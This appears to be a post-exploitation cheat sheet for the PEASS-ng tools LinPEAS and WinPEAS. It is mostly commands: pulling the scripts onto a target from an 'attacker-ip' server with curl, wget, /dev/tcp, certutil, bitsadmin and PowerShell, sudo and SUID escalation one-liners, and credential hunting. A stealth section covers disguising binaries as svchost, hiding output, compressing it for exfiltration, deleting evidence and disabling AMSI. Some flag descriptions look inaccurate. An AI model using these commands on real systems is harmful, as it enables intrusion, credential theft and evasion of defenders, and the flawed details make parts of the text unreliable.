PEASS-ng (Privilege Escalation Awesome Scripts Suite) is a collection of self-contained scripts for automated enumeration of privilege escalation vectors. LinPEAS targets Linux/macOS, WinPEAS targets Windows. These tools are essential for post-exploitation and CTF scenarios to quickly identify misconfigurations, weak permissions, and credential exposure.
PEASS-ng components:
| Component | Target | Language | Purpose |
|---|
| LinPEAS | Linux/macOS | Bash/Python | Automated privilege escalation enumeration |
| WinPEAS | Windows | C# (.exe/.bat) | Windows privilege escalation enumeration |
| ProcMon-ng | Windows | Standalone | Process monitoring for privilege escalation |
| JAWS | Windows | Bash | Lightweight Windows enumeration (PowerShell) |
# Download from GitHub
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# Transfer via curl/wget on target
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
# Transfer via Python HTTP server (local)
python3 -m http.server 8000
# On target: curl http://attacker-ip:8000/linpeas.sh -o linpeas.sh
# Transfer via base64 (no internet)
base64 -w0 linpeas.sh | tr -d '\n'
# On target: echo "base64-content" | base64 -d > linpeas.sh
# Make executable and run
chmod +x linpeas.sh
./linpeas.sh
| Flag | Description |
|---|
-a | Aggressive mode (thorough checks, longer runtime) |
-s | Sudo-only mode (skips standard user checks, must run with sudo) |
-p <string> | Grep for processes matching pattern |
-t | Tests for CVE-2021-4034 (PwnKit), CVE-2021-1732, CVE-2021-22555 |
-g | Grep for files/processes matching pattern (case-insensitive) |
-o | Output only interesting results (hides “positive” findings) |
-q | Quiet mode (minimal output, very fast) |
-w | Wait between operations (slow mode, less detectable) |
-n | Timeout for subprocess (default: 30s) |
--help | Show all available options |
# Quick enumeration with interesting findings
./linpeas.sh -o
# Aggressive enumeration (thorough)
./linpeas.sh -a
# Quiet mode for stealth
./linpeas.sh -q
# Sudo checks only (if you have partial sudo access)
./linpeas.sh -s
# Look for CVE exploitable conditions
./linpeas.sh -t
# Grep for specific process (e.g., Apache)
./linpeas.sh -p apache
# Slow mode with 5-second delays (less suspicious)
./linpeas.sh -w 5
# LinPEAS Python version (alternative to bash)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.py
# Run with Python
python3 linpeas.py -a
# Benefits: cross-platform, avoids bash restrictions
# Download .exe (compiled C#)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winpeas.exe
# Download .bat (batch script version)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winpeas.bat
# Execute .exe
winpeas.exe
# Execute .bat (requires cmd.exe)
winpeas.bat
# Obfuscate filename before execution (OPSEC)
ren winpeas.exe svchost.exe
svchost.exe
| Flag | Description |
|---|
searchfast | Quick enumeration (skips slow checks) |
searchall | Comprehensive search (longer runtime) |
quiet | Minimal output |
notcolor | Disable color output |
log <logfile> | Write output to file instead of console |
h | Show help message |
# Quick enumeration
winpeas.exe searchfast
# Comprehensive enumeration
winpeas.exe searchall
# Quiet mode, save to file (stealth)
winpeas.exe quiet log output.txt
# No color output (useful for log files)
winpeas.exe searchall notcolor > results.txt
# LinPEAS output highlights SUID binaries with known exploits
# Look for: red-colored entries = high risk
# Manual check if LinPEAS missed anything
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation
# Example: /usr/bin/sudo with NOPASSWD sudo rights
# LinPEAS finds capabilities that can be abused
# Examples: cap_setuid, cap_dac_override, cap_sys_admin
# Manual check
getcap -r / 2>/dev/null
# High-risk capabilities: CAP_DAC_OVERRIDE, CAP_SYS_ADMIN, CAP_SETUID
# LinPEAS enumerates cron jobs and checks for:
# - World-writable scripts
# - Scripts in /tmp or user-writable directories
# - Weak permissions on crontabs
# Manual check
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /var/spool/cron/crontabs/
# LinPEAS identifies writable directories in:
# - /tmp, /var/tmp, /dev/shm
# - Libraries and modules loaded by privileged processes
# - Directories in PATH
find /usr/bin -writable 2>/dev/null
find /lib -writable 2>/dev/null
echo $PATH | tr ':' '\n' | xargs ls -la
# LinPEAS searches for:
# - Plaintext passwords in config files
# - SSH private keys in ~/.ssh/
# - Database credentials in application configs
# - .bash_history, .zsh_history with credentials
grep -r "password" /etc/app-config/ 2>/dev/null
grep -r "API_KEY" ~/.bashrc 2>/dev/null
# LinPEAS checks sudo access (if user can run)
sudo -l
# Critical finding: NOPASSWD entries allow privilege escalation
# Example: (ALL) NOPASSWD: /usr/bin/find
# Exploit: sudo find / -exec /bin/bash \;
# WinPEAS identifies unquoted paths in services
# Example: C:\Program Files\MyApp\Service.exe
# Can be exploited if C:\Program.exe exists
# Manual check
wmic service list brief
# WinPEAS checks if current user can modify services
# High risk: modifiable service binary path
# Check service permissions manually
icacls "C:\Program Files\Service\service.exe"
# WinPEAS searches for:
# - Writable registry keys (esp. HKLM)
# - Plaintext passwords in registry
# - RunAs credentials stored in registry
reg query HKLM\Software /s /v password
# WinPEAS looks for:
# - Cached credentials in LSA
# - Credentials in application configs (.xml, .ini, .json)
# - Autologon credentials in registry
# - DPAPI-encrypted credentials (if decryptable)
# Manual check
cmdkey /list
findstr /s password *.xml
# WinPEAS checks if sensitive files are writable
# High risk: writable .exe or .dll in System32
icacls "C:\Windows\System32\drivers\etc\hosts"
# HTTP download (fastest, requires internet)
curl -o linpeas.sh http://attacker-ip:8000/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
# wget alternative
wget http://attacker-ip:8000/linpeas.sh -O linpeas.sh
# Python one-liner (if Python available)
python3 -c "import urllib.request; urllib.request.urlretrieve('http://attacker-ip:8000/linpeas.sh', 'linpeas.sh')"
# Bash /dev/tcp (no external tools)
exec 3<>/dev/tcp/attacker-ip/8000
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: attacker-ip\r\nConnection: close\r\n\r\n" >&3
cat <&3 > linpeas.sh
# scp (if SSH access)
scp attacker@attacker-ip:/path/linpeas.sh .
# Base64 via clipboard/email
base64 -w0 linpeas.sh
# Decode on target: echo "base64..." | base64 -d > linpeas.sh
# PowerShell download (most reliable on Windows)
powershell -Command "Invoke-WebRequest -Uri 'http://attacker-ip:8000/winpeas.exe' -OutFile 'winpeas.exe'"
# certutil (built-in, no PowerShell required)
certutil -urlcache -split -f http://attacker-ip:8000/winpeas.exe winpeas.exe
# bitsadmin (background intelligent transfer)
bitsadmin /transfer myDownload http://attacker-ip:8000/winpeas.exe %cd%\winpeas.exe
# cmd.exe with ftp
echo open attacker-ip > ftp.txt
echo binary >> ftp.txt
echo GET winpeas.exe >> ftp.txt
ftp -s:ftp.txt
# Direct from GitHub (if internet available)
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/winpeas.exe' -OutFile 'winpeas.exe'"
# 1. Rename binary before execution (avoid process name detection)
cp linpeas.sh svchost.sh
./svchost.sh
# 2. Use quiet mode for minimal output
./linpeas.sh -q > /tmp/.results
# 3. Add delays to avoid detection
./linpeas.sh -w 10
# 4. Redirect output to hidden file
./linpeas.sh > /tmp/.enum.txt 2>&1
# 5. Compress output before exfiltration
./linpeas.sh | gzip | base64
# 6. Run during off-hours or normal activity windows
# Use cron or scheduled tasks for delayed execution
# 7. Clean up after execution
rm -f linpeas.sh svchost.sh /tmp/.enum.txt
# 8. For Windows: disable UAC/AMSI if possible
# Run from legitimate Windows processes (svchost.exe, explorer.exe context)
# Linux: Run in container or VM if suspicious environment detected
# Check for monitoring tools in LinPEAS output
# Windows: obfuscate script execution
# Use unsigned executables cautiously
# Consider encoding payload in alternative format
# General: Review findings offline, don't run exploits interactively
# Extract LinPEAS output → analyze locally → execute exploits separately
# Use LinPEAS output to identify local_exploit_suggester matches
# Run LinPEAS → export findings → use in MSFconsole
msfconsole
> local_exploit_suggester -session 1
# Cross-reference SUID binaries from LinPEAS with GTFOBins
# LinPEAS highlights binaries, check https://gtfobins.github.io/
# Example: if LinPEAS shows /usr/bin/find is SUID
# Check GTFOBins: /usr/bin/find -exec /bin/sh \;
# Run both WinPEAS and PrivescCheck for comprehensive coverage
# WinPEAS: more user-friendly output
# PrivescCheck: deeper registry/WMI checks
# Combine findings for complete privilege escalation map
| Color | Meaning |
|---|
| Red | Critical vulnerability or high-risk finding |
| Yellow | Medium risk or requires further investigation |
| Green | Positive finding (configuration is secure or finding confirmed) |
| White | Neutral information |
| 21 (95) | File modification time notation (age of file) |
- Kernel, OS & Devices: System version, kernel exploits
- Users & Groups: Local users, groups, sudo access
- User & Privilege Related: Current user context, sudo capabilities
- Environment: PATH, libraries, writable locations
- SUID & SGID: Setuid/setgid binaries with exploitation potential
- Capabilities: Linux capabilities on binaries
- Cron Jobs: Scheduled tasks and writability
- Files: Interesting files, SSH keys, credentials
- Network: Listening ports, established connections
- Packages: Installed applications with known vulnerabilities
# Most useful combination
./linpeas.sh -o | tee linpeas-output.txt
# For CTF speed-running
./linpeas.sh -q
# Full aggressive scan
./linpeas.sh -a 2>/dev/null
# If bash restricted, use Python
python3 linpeas.py -a
# Quick enumeration, save output
winpeas.exe searchfast log results.txt
# Stealth: quiet + file output + obfuscated name
ren winpeas.exe taskhost.exe
taskhost.exe quiet log c:\temp\.report.txt
- Run PEASS-ng → Get full enumeration
- Analyze output → Identify high-risk findings
- Verify findings → Manually test privilege escalation vector
- Exploit → Use GTFOBins, public exploits, or custom scripts
- Verify success → Confirm root/SYSTEM access
- Clean up → Remove scripts and evidence
